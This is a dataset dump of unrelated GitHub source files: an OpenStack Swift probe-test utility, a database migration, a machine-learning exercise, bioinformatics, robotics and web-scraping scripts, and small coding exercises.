container_name,\n object_name, headers=headers,\n contents=contents, query_string=query_string)\n\n def delete_object(self, container_name, object_name):\n try:\n client.delete_object(self.url, self.token,\n container_name, object_name)\n except ClientException as err:\n if err.http_status != HTTP_NOT_FOUND:\n raise\n\n def head_object(self, container_name, object_name):\n return 
client.head_object(self.url, self.token, container_name,\n object_name)\n\n def get_object(self, container_name, object_name, query_string=None):\n return client.get_object(self.url, self.token,\n container_name, object_name,\n query_string=query_string)\n\n\ndef translate_client_exception(m):\n @functools.wraps(m)\n def wrapper(*args, **kwargs):\n try:\n return m(*args, **kwargs)\n except UnexpectedResponse as err:\n raise ClientException(\n err.args[0],\n http_scheme=err.resp.environ['wsgi.url_scheme'],\n http_host=err.resp.environ['SERVER_NAME'],\n http_port=err.resp.environ['SERVER_PORT'],\n http_path=quote(err.resp.environ['PATH_INFO']),\n http_query=err.resp.environ['QUERY_STRING'],\n http_status=err.resp.status_int,\n http_reason=err.resp.explanation,\n http_response_content=err.resp.body,\n http_response_headers=err.resp.headers,\n )\n return wrapper\n\n\nclass InternalBrainClient(object):\n\n def __init__(self, conf_file, account='AUTH_test'):\n self.swift = InternalClient(conf_file, 'probe-test', 3)\n self.account = account\n\n @translate_client_exception\n def put_container(self, container_name, headers):\n return self.swift.create_container(self.account, container_name,\n headers=headers)\n\n @translate_client_exception\n def post_container(self, container_name, headers):\n return self.swift.set_container_metadata(self.account, container_name,\n headers)\n\n @translate_client_exception\n def delete_container(self, container_name):\n return self.swift.delete_container(self.account, container_name)\n\n def parse_qs(self, query_string):\n if query_string is not None:\n return {k: v[-1] for k, v in parse_qs(query_string).items()}\n\n @translate_client_exception\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return self.swift.upload_object(BytesIO(contents), self.account,\n container_name, object_name,\n headers=headers,\n params=self.parse_qs(query_string))\n\n @translate_client_exception\n def delete_object(self, container_name, object_name):\n return self.swift.delete_object(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def head_object(self, container_name, object_name):\n return self.swift.get_object_metadata(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def get_object(self, container_name, object_name, query_string=None):\n status, headers, resp_iter = self.swift.get_object(\n self.account, container_name, object_name,\n params=self.parse_qs(query_string))\n return headers, b''.join(resp_iter)\n\n\nclass BrainSplitter(BaseBrain):\n def __init__(self, url, token, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = PublicBrainClient(url, token)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nclass InternalBrainSplitter(BaseBrain):\n def __init__(self, conf, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = InternalBrainClient(conf)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nparser = OptionParser('%prog [options] '\n '[:[,...]] [...]')\nparser.usage += '\\n\\nCommands:\\n\\t' + \\\n '\\n\\t'.join(\"%s - %s\" % (name, doc) for name, doc in\n BrainSplitter.__docs__.items())\nparser.add_option('-c', '--container', default='container-%s' % uuid.uuid4(),\n help='set container name')\nparser.add_option('-o', '--object', default='object-%s' % uuid.uuid4(),\n help='set object 
name')\nparser.add_option('-s', '--server_type', default='container',\n help='set server type')\nparser.add_option('-P', '--policy_name', default=None,\n help='set policy')\n\n\ndef main():\n options, commands = parser.parse_args()\n if not commands:\n parser.print_help()\n return 'ERROR: must specify at least one command'\n for cmd_args in commands:\n cmd = cmd_args.split(':', 1)[0]\n if cmd not in BrainSplitter.__commands__:\n parser.print_help()\n return 'ERROR: unknown command %s' % cmd\n url, token = get_auth(PROXY_BASE_URL + '/auth/v1.0',\n 'test:tester', 'testing')\n if options.server_type == 'object' and not options.policy_name:\n options.policy_name = POLICIES.default.name\n if options.policy_name:\n options.server_type = 'object'\n policy = POLICIES.get_by_name(options.policy_name)\n if not policy:\n return 'ERROR: unknown policy %r' % options.policy_name\n else:\n policy = None\n brain = BrainSplitter(url, token, options.container, options.object,\n options.server_type, policy=policy)\n for cmd_args in commands:\n parts = cmd_args.split(':', 1)\n command = parts[0]\n if len(parts) > 1:\n args = utils.list_from_csv(parts[1])\n else:\n args = ()\n try:\n brain.run(command, *args)\n except ClientException as e:\n print('**WARNING**: %s raised %s' % (command, e))\n print('STATUS'.join(['*' * 25] * 2))\n brain.servers.status()\n sys.exit()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"openstack/swift","sub_path":"test/probe/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":13515,"program_lang":"python","lang":"en","doc_type":"code","stars":2518,"dataset":"github-code","pt":"39"} +{"seq_id":"35997209613","text":"\"\"\"add sername\n\nRevision ID: 95c9c965f366\nRevises: f6eda7049057\nCreate Date: 2023-01-25 13:13:56.030336\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '95c9c965f366'\ndown_revision = 'f6eda7049057'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('surname', sa.String(length=32), server_default='ivanov', nullable=True))\n\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('rating', sa.Integer(), server_default='1', nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.drop_column('rating')\n\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.drop_column('surname')\n\n # ### end Alembic commands ###\n","repo_name":"EvgeniDorofeevskiy/flask2","sub_path":"migrations/versions/95c9c965f366_add_sername.py","file_name":"95c9c965f366_add_sername.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70159971633","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree, export_graphviz, export_text\n\n\ntrain = pd.read_excel('data/lendingclubtraindata.xlsx')\nvalidation=pd.read_excel('data/lendingclubvaldata.xlsx')\ntest=pd.read_excel('data/lendingclubtestdata.xlsx')\n\n\n# store target column\ny_train = train['loan_status']\ny_val=validation['loan_status']\ny_test=test['loan_status']\n\n# exercise 1\nprob_1=len(y_train[y_train==1])/len(y_train)\nprob_2=1.0-prob_1\nprint(\"Initial entropy=\",-prob_1*np.log2(prob_1)-prob_2*np.log2(prob_2))\n\n# exercise 2\n# From the dataset we have that 60.40% own their home and 39.60% rent.\nhome_owners=train[train.home_ownership==1]\nhome_owner_prob=len(home_owners)/len(y_train)\nprint('prob own home=',home_owner_prob)\n# Loans were fully paid for 81.72 % of those who owned their home\nhome_owners_paid=home_owners[home_owners.loan_status==1]\nprob_home_owner_paid=len(home_owners_paid)/len(home_owners)\nprint('prob own home and paid =',prob_home_owner_paid)\n\n# 75.29% of those who rented paid their loans\nhome_rent=train[train.home_ownership==0]\nhome_rent_paid=home_rent[home_rent.loan_status==1]\nprob_home_rent_paid=len(home_rent_paid)/len(home_rent)\nprint('prob own rent and paid =',prob_home_rent_paid)\n\n# , the entropy is\n# 0.6040(−0.8172 ln(0.8172) − 0.1828 ln(0.1828))\n# + 0.3960(−0.7529 ln(0.7529) − 0.2471 ln(0.2471)) = 0.7339\n# So the reduction in entropy if we use this feature is 0.7382 − 0.7339 = 0.0043\n\n# exercise 3\n\n# remove target column to create feature only dataset\nX_train = train.drop('loan_status',axis=1)\nX_val=validation.drop('loan_status',axis=1)\nX_test=test.drop('loan_status',axis=1)\n\n\nclf = DecisionTreeClassifier(criterion='entropy',max_depth=4,min_samples_split=1000,min_samples_leaf=200,random_state=0)\nclf = clf.fit(X_train,y_train)\n# fig, ax = plt.subplots(figsize=(40, 30))\n# plot_tree(clf, filled=True, feature_names=X_train.columns, proportion=True)\n# plt.show()\n\ntrain_score=clf.score(X_train,y_train)\ntest_score=clf.score(X_test,y_test)\n\nprint('train_score=',train_score)\nprint('test_score=',test_score)\n","repo_name":"eightsmile/cqf","sub_path":"Module4/Lec6_DecisionTree/CQF_January_2023_M4L6_Solutions-1/loanclub.py","file_name":"loanclub.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"39"} +{"seq_id":"8971398385","text":"import dr_tools, sys, pysam\nimport os, argparse\nfrom joblib import Parallel, delayed\nsys.path.insert(0, '../src')\nimport GenomeFetch\n\n\"\"\"\nThis script removes reads when 3' has TGG on the genome\nWorks for smallrna star folder. 
aka max32, max38\n\n>adapter_three_prime\nTGGAATTCTCGGGTGCCAAGG\n>polyA\nAAAAAAAAAAAAA\n\"\"\"\n\ndef safe_mkdir(path):\n\tif not os.path.exists(path):\n\t\tos.mkdir(path)\n\t\tos.chmod(path, 0o774)\n\ndef remove_reads_from_precursor(inbam):\n\n\t\"\"\"\n\tprepare input/output files\n\t\"\"\"\n\tinbamPysamObj = pysam.Samfile(inbam, \"rb\" )\n\tp = inbam.split(\"/\")\n\toutbamTmp = \"/\".join(p[:-3]+[o.outstardir]+p[-2:])\n\tbam_out = \".\".join(outbamTmp.split(\".\")[:-1]) + \"_tmp.bam\"\n\tbam_out_sorted = \".\".join(outbamTmp.split(\".\")[:-1])\n\toutbam = pysam.Samfile(bam_out, \"wb\", template=inbamPysamObj)\n\n\t\"\"\"\n\tcreate genome fetch object\n\t\"\"\"\n\tgf = GenomeFetch.GenomeFetch(genomedir=o.genome_dir)\n\n\t\"\"\"\n\tremove reads when 3' has TGG on the genome\n\t\"\"\"\n\tfor read in inbamPysamObj:\n\t\tread_name = read.qname\n\t\ttid = read.rname\n\t\treadchr = inbamPysamObj.getrname(tid)\n\t\treadstart = int(read.pos) + 1\n\t\treadend = read.aend\n\t\tstrand = read.flag\n\t\treadlen = len(read.seq) #this is the actual read length (41M, means readlen=41)\n\t\tread_len = read.qlen #this only considers matches (8S30M, means read_len=30)\n\t\tminRlen = o.minRlen\n\t\tif readlen <= o.readlen_cutoff:\n\t\t\toutbam.write(read)\n\t\t\tcontinue\n\t\t\n\t\tif strand ==0: #read maps to forward strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readend+1, readend+upperlimit)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"T\" or bpwindow == \"A\"): continue #TGGAATTCTCGGGTGCCAAGG\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"TG\" or bpwindow == \"AA\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"TGG\" or bpwindow == \"AAA\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TGGA\" or bpwindow == \"AAAA\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TGGAA\" or bpwindow == \"AAAAA\"): continue\n\t\t\telse: outbam.write(read)\n\n\t\telif strand ==16: #read maps to reverse strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readstart-upperlimit, readstart-1)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"A\" or bpwindow == \"T\"): continue #TTCCA\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"CA\" or bpwindow == \"TT\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"CCA\" or bpwindow == \"TTT\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TCCA\" or bpwindow == \"TTTT\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TTCCA\" or bpwindow == \"TTTTT\"): continue\n\t\t\telse: outbam.write(read)\n\n\toutbam.close()\n\t#sort and index the final bam file\n\tpysam.sort(bam_out, bam_out_sorted)\t\n\tpysam.index(bam_out_sorted+\".bam\", template=inbamPysamObj)\n\tos.remove(bam_out)\n\n#main function\nif '__main__' == __name__:\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-i', '--instardir', required=True)\n\tparser.add_argument('-o', '--outstardir', required=True)\n\tparser.add_argument('-g', '--genome_dir', default=\"path_to_reference_genome\")\n\tparser.add_argument('-c', '--readlen_cutoff', default=35)\n\tparser.add_argument('-x', '--minRlen', default=41, type=int) #minimum read length to define a precursor\n\tparser.add_argument('-p', '--numCPU', default=20, type=int)\n\to = parser.parse_args()\n\n\tif not os.path.exists(o.outstardir): safe_mkdir(o.outstardir)\n\n\tsample_names = os.listdir(o.instardir)\n\tsamplenames_with_fullpath = []\n\tfor sample in sample_names:\n\t\t##prepare input files\n\t\tbam = os.path.join(o.instardir, sample, \"%s.bam\" %sample)\n\t\tsamplenames_with_fullpath.append(bam)\n\n\t\tpath_outbam = os.path.join(o.outstardir, sample)\n\t\tif not os.path.exists(path_outbam): safe_mkdir(path_outbam)\n\n\tParallel(n_jobs=o.numCPU)(delayed(remove_reads_from_precursor)(sample) for sample in samplenames_with_fullpath)\n\n","repo_name":"eyay/smallseq","sub_path":"src/remove_reads_with_genomic_TGG.py","file_name":"remove_reads_with_genomic_TGG.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"43564886608","text":"#!/usr/bin/env python\n#\n# Gets robot state and publishes as tf transform\nimport rospy\nfrom tf2_ros import TFMessage\nfrom sensor_msgs.msg import JointState\nimport argparse\nimport rbd_spot\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Publish Spot RobotState as TF messages\")\n parser.add_argument(\"--root-frame\", type=str, help=\"The name of the root frame of the TF tree\",\n default=\"body\")\n args, _ = parser.parse_known_args()\n\n rospy.init_node(\"spot_state_tf_publisher\")\n conn = rbd_spot.SpotSDKConn(sdk_name=\"StateTFPublisher\")\n robot_state_client = rbd_spot.state.create_client(conn)\n tf_pub = rospy.Publisher('/tf', TFMessage, queue_size=10)\n js_pub = rospy.Publisher('/joint_states', JointState, queue_size=10)\n\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n state = rbd_spot.state.getRobotState(robot_state_client)\n tf_msg = rbd_spot.state.get_tf_from_state(state, conn, args.root_frame)\n js_msg = rbd_spot.state.get_joint_state_from_state(state, conn)\n\n tf_pub.publish(tf_msg)\n js_pub.publish(js_msg)\n print(\"published\")\n rate.sleep()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zkytony/robotdev","sub_path":"spot/ros_ws/src/rbd_spot_robot/scripts/state_publisher.py","file_name":"state_publisher.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"22866323765","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef get_bs_obj(company_code):\r\n url = \"https://finance.naver.com/item/main.nhn?code=\" + company_code\r\n result = requests.get(url)\r\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\r\n return bs_obj\r\n\r\n# takes a bs_obj and returns the price\r\ndef get_price(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"})\r\n blind_now = no_today.find(\"span\", {\"class\": \"blind\"})\r\n return blind_now.text\r\n\r\n# takes a bs_obj and returns the candle chart data\r\ndef get_candle_chart_data(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n td_first = bs_obj.find(\"td\", {\"class\":\"first\"})\r\n blind = td_first.find(\"span\", {\"class\":\"blind\"})\r\n\r\n #close: previous day's closing price\r\n close = blind.text\r\n\r\n return close\r\n\r\n# samsung 005930\r\n# naver 035420\r\n# kakao 035720\r\ncompany_codes = [\"005930\", \"035420\", \"035720\"]\r\nfor item in company_codes:\r\n price = get_price(item)\r\n close = get_candle_chart_data(item)\r\n print(price, close)\r\n\r\n\r\n\r\n\r\n","repo_name":"ehdalseorka1/crowling","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"5675295109","text":"#Automation Package\nfrom playwright.sync_api import sync_playwright\nimport time\n#Scraping 
Package\nfrom selectolax.parser import HTMLParser\nfrom bs4 import BeautifulSoup as bs\n#Preprosscsing Package\nimport pandas as pd\nimport numpy as np\nimport re\nfrom datetime import datetime as dt\nimport json\nimport os\n##################################################\n#Create Automating Page\nwith sync_playwright() as playwright:\n #Launch the browser and go to the page\n browser = playwright.chromium.launch(headless=False , slow_mo=200)\n page = browser.new_page()\n page.set_viewport_size({'width':1920,'height':1080})\n page.goto('https://www.glassdoor.com/Job',wait_until='domcontentloaded')\n\n\n\n #Adjust Resarch Job and Filters\n page.get_by_placeholder('Find your perfect job').type('Data Analyst',delay=200) #Write Data Analyst in job research\n page.locator('div input[value=\"Data Analyst\"]').press('Enter') #Press Enter\n page.wait_for_timeout(2000) # Wait for several milliseconds\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").type('Remote',delay=200)#Write Remote in location research\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").press('ArrowDown+Enter')#Press Arrow Down Enter to choose the first result\n page.wait_for_timeout(1000) # Wait for several milliseconds\n page.locator(\"div > [data-test='DATEPOSTED']:visible\").click() #Click in Dateposted to make it visible\n # If Last 3 Days not found\n try:\n page.locator(\"button[value='3']\").click() # Choose the Last 3 Days\n except:\n page.locator(\"button[value='1']\").click() # Choose the last 3 Days\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.locator(\"div [data-test='sort-by-header']:visible\").click()# Make sort header visible\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.get_by_role('button',name='Recent').click() # Sort by recent res\n\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait for selector\n \n def iter_each_job(Jobs):\n '''\n This function take all 30 jobs in the page and loop\n for each one of them to extract more info about each job\n like job_description , salray , about the company and more\n finaly store the result in the genrator to loop on it in another time\n '''\n for i in range(len(Jobs)):\n page.locator(\"li[class*='react-job-listing']\").all()[i].click()\n page.wait_for_timeout(2000)# Wait for several milliseconds\n if page.locator(\"div[class*='actionBar'] > button\").count() == 1:# Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body') \n else: \n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body')\n\n\n # html_bodies = iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()) \n\n def scrape_data(body):\n '''\n This function works to store the data in json list of dict\n first loop over all right continer jobs in the page to\n just get the job title , company title ,location and date posted\n from the main body of html\n '''\n \n html = HTMLParser(body) # parse the the body of html page to dealing with it using css selector\n df=[{\n 
'Job_Title':title.text(),#Extract the Job Title\n 'Company_Title':re.sub(r'[^A-z]',' ',company.text()).strip(), # Substract all anything except string than get the string\n 'Location':location.text(),#Extract the Location of the company\n 'Date_Posted':dt.strftime(dt.now() - pd.Timedelta(value= int(re.findall(r'\\d',date_posted.text())[0]), unit='D'),'%Y-%m-%d') if re.findall(r'[A-z]',date_posted.text())[0].lower() != 'h' else dt.strftime(dt.now(),'%Y-%m-%d'),\n } # if the date posted is 24h i'll return the today's day in date formating else the date posted like 5d i'll substract 5 days from today's date and return it in formating date \n for title ,company ,location, date_posted in zip(html.css(\"div [class*='job-title']\"),html.css(\"div [id*=job-employer]\"),html.css(\"div[class*='location mt-xxsm']\"),html.css(\"div [data-test='job-age']\"))] \n \n # Loop for each job to get the job describtion and more info about the company\n df_desc = []\n for job in iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()):\n html_desc = HTMLParser(job) # parse the first html of the job desc\n if len(html_desc.css(\"#CompanyContainer\")) != 0 : # Check if there is a comany over view container\n company_over_view = {company_overview_matric.text().lower():company_overview_value.text().lower() for company_overview_matric,company_overview_value in zip(html_desc.css(\"#CompanyContainer div span[class*='1taruhi']\"),html_desc.css(\"#CompanyContainer div span[class*='i9gxme']\"))} \n df_desc.append(# First, I have to iterate on the key and the value for each container I did a dictionary because there are some jobs that have incomplete information and without order\n {'Size' : company_over_view['size'] if 'size' in company_over_view.keys() else np.NaN,\n 'Founded' : int(company_over_view['founded']) if 'founded' in company_over_view.keys() else np.NaN,\n 'Type' : company_over_view['type'] if 'type' in company_over_view.keys() else np.NaN,\n 'Industry' : company_over_view['industry'] if 'industry' in company_over_view.keys() else np.NaN,\n 'Sector' : company_over_view['sector'] if 'sector' in company_over_view.keys() else np.NaN,\n 'Revenue' : company_over_view['revenue'] if 'revenue' in company_over_view.keys() else np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div [class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n )\n else: # If the comany over view container fill all the data with null values\n df_desc.append(\n {'Size' : np.NaN,\n 'Founded' : np.NaN,\n 'Type' : np.NaN,\n 'Industry' : np.NaN,\n 'Sector' : np.NaN,\n 'Revenue' : np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div [class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n 
)\n\n # #Update the dictionaries with each other\n for z , zz in zip(df , df_desc):\n z.update(zz)\n Data_Frame = df\n \n\n return Data_Frame\n \n\n def Create_newfile(your_filename):\n # Check If the file is exists if not create new one\n '''\n This function take your file name to create a new file if\n the file dosen't exists and if not remove the exists file\n which's contains the old data and create new one that \n will has the new data in it\n '''\n if os.path.exists(your_filename) :\n os.remove(your_filename)\n open(your_filename,'w').close()\n else:\n open(your_filename,'w').close()\n\n Create_newfile('Glassdoor.json')\n \n\n # Write data into json file\n def write_json(data , filename):\n '''\n This function takes the data that you wanna write\n and the file name and it'll automatice write the data\n and close the file \n '''\n with open(filename , 'w') as file: \n json.dump(data , file,indent=4)\n file.close()\n\n def append_new_data(new_data , filename):\n '''\n this function takes the new data that you wanna append to\n the json file and the file name and\n '''\n # first read the json file to load the old data\n with open(filename,'r') as file:\n old_data = json.load(file)\n for data in new_data:\n old_data.append(data) # loop through list of dict to append each dict \n all_data = old_data\n write_json(all_data,filename)# now update the json file by writing all data \n file.close()\n \n\n num_pages = int(page.locator(\"div[class='paginationFooter']\").inner_text().split(' ')[-1]) # Extract the number of pages \n counter = 0\n while counter < num_pages: # Loop for number of pages \n \n if page.locator(\"div[class*='actionBar'] > button\").count() == 1: # Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n\n # else: # there is no register page\n data = scrape_data(page.inner_html('body')) # Extract the body of the page\n\n # Store The Data in json file\n #Using try and except to avoid the error which will happen because the empty file\n try:\n append_new_data(data , 'Glassdoor.json')#Second, the function will append the new data, and the first time the file will be empty of course I got an error so I should use the write function first to write the data\n except: \n write_json(data , 'Glassdoor.json')#Third for only the first time I gonna use the right function directly but then I gonna use it from the append function to write the new data \n\n if counter > 0 and page.locator('button[disabled]').count() == 1:# th break the last page\n break\n\n page.get_by_role('button',name='Next').click() # Move to the next page\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait untile the selector load\n \n page.wait_for_timeout(3000) # # Wait for several milliseconds \n \n counter += 1\n\n page.close()\n \n\n","repo_name":"bhr100/Data-Analyst-Jobs","sub_path":"Jobs-Scraper.py","file_name":"Jobs-Scraper.py","file_ext":"py","file_size_in_byte":11342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"70341084204","text":"from collections import defaultdict\n\n\nclass UndergroundSystem:\n\n def __init__(self):\n self.journey = defaultdict()\n self.history = defaultdict()\n \n def checkIn(self, id: int, startStation: str, t: int) -> None:\n self.journey[id] = (startStation, t)\n \n\n def checkOut(self, id: int, endStation: str, endTime: int) -> None:\n startStation, startTime = self.journey.pop(id)\n key = (startStation, endStation)\n allTime, allCount = 
self.history.get(key, (0, 0))\n        self.history[key] = (allTime + (endTime - startTime), allCount + 1)\n    \n    def getAverageTime(self, startStation: str, endStation: str) -> float:\n        key = (startStation, endStation)\n        allTime, allCount = self.history.get(key, (0, 0))\n        return allTime / allCount\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\nobj = UndergroundSystem()\nobj.checkIn(1, \"dhaka\", 23)\nobj.checkOut(1, \"kishoreganj\", 30)\nt = obj.getAverageTime(\"dhaka\", \"kishoreganj\")\nprint(t)","repo_name":"fkshohag/All-algorithm","sub_path":"Online-judge/leetcode/design-underground-system.py","file_name":"design-underground-system.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"27402002697","text":"import moviepy.editor as mpy\nimport gizeh as gz\n\nVIDEO_SIZE = (1920, 1080)\nWHITE = (255, 255, 255)\nDURATION = 5\nKIDS_PIC = \"./assets/cyberscooty-two-kids.png\"\nTEACHER_PIC = \"./assets/teacher.png\"\n\nif __name__ == '__main__':\n    kids_pic = mpy.ImageClip(KIDS_PIC). \\\n        set_position((15,900)).resize(width=200)\n\n    teacher_pic = mpy.ImageClip(TEACHER_PIC). \\\n        set_position((1900,900)).resize(width=200)  # was KIDS_PIC, which left TEACHER_PIC unused\n\n    video = mpy.CompositeVideoClip(\n        [\n            kids_pic,\n            teacher_pic\n        ],\n        size=VIDEO_SIZE).\\\n        on_color(\n            color=WHITE,\n            col_opacity=1).set_duration(DURATION)\n\n    video.write_videofile('sample.mp4', fps=10)\n","repo_name":"nishantnischaya/YoutubeAutogenerated","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35501826900","text":"from sympy import symbols, diff, Function, pi, dsolve, solve, integrate\n\nheight = 30e-2\nd_1 = 8.2e-2\nd_2 = 13e-2\nt_1 = 20\nt_2 = 520\nlambda_ = 100\n\nA = Function('A')\nt = symbols('t')\nPhi = symbols('Phi')\ny = symbols('y')\n\neq1 = diff(A(y), y, 2)\nA = solve(dsolve(eq1, ics={A(0): pi/4*d_2**2, A(height): pi/4*d_1**2}), A(y))[0]\n# Phi = -lambda_*A*diff(t, y)\nresult1 = integrate(-1/(lambda_ * A), (y, 0, height))\nresult2 = integrate(1, (t, t_2, t_1))\nPhi = result2 / result1\nprint(f'Phi = {Phi:.2f} W')\n","repo_name":"hustquick/HeatTransfer","sub_path":"Problems/pr02-30.py","file_name":"pr02-30.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"22630954220","text":"# Written by Arno Bakker \n# see LICENSE.txt for license information\n\nfrom threading import currentThread\n\nfrom Tribler.Core.API import *\nfrom Tribler.Video.VideoServer import VideoHTTPServer\n\n\ndef state_callback(d,ds):\n    print >>sys.stderr,\"main: Stats\",dlstatus_strings[ds.get_status()],ds.get_progress(),\"%\",ds.get_error()\n\ndef vod_ready_callback(d,event,params):\n    print >>sys.stderr,\"main: VOD ready callback called\",currentThread().getName(),\"###########################################################\",params[\"mimetype\"]\n\n    \"\"\"\n    f = open(\"video.avi\",\"wb\")\n    while True:\n        data = stream.read()\n        print >>sys.stderr,\"main: VOD ready callback: reading\",type(data)\n        print >>sys.stderr,\"main: VOD ready callback: reading\",len(data)\n        if len(data) == 0:\n            break\n        f.write(data)\n    f.close()\n    stream.close()\n    \"\"\"\n\n    videoserv = VideoHTTPServer.getInstance()\n    videoserv.set_inputstream('video/mpeg',params[\"stream\"],None)\n    \n\nif __name__ == \"__main__\":\n    \n    videoserv = 
VideoHTTPServer.getInstance() # create\n    videoserv.background_serve()\n    \n    s = Session()\n    \n    if sys.platform == 'win32':\n        tdef = TorrentDef.load('bla.torrent')\n    else:\n        tdef = TorrentDef.load('/tmp/bla.torrent')\n    dcfg = DownloadStartupConfig.get_copy_of_default()\n    #dcfg.set_saveas('/arno')\n    dcfg = DownloadStartupConfig.get_copy_of_default()\n    dcfg.set_video_start_callback(vod_ready_callback)\n    #dcfg.set_selected_files('MATRIX-XP_engl_L.avi') # play this video\n    #dcfg.set_selected_files('field-trip-west-siberia.avi')\n    \n    d = s.start_download(tdef,dcfg)\n    d.set_state_callback(state_callback,1)\n    #d.set_max_upload(100)\n    \n    time.sleep(10)\n    \n    \"\"\" \n    d.stop()\n    print \"After stop\"\n    time.sleep(5)\n    d.restart()\n    \"\"\"\n    time.sleep(2500)\n    \n","repo_name":"csko/Tribler-gossip","sub_path":"Tribler/Test/API/test_vod.py","file_name":"test_vod.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"32934264937","text":"from typing import List\n\nimport 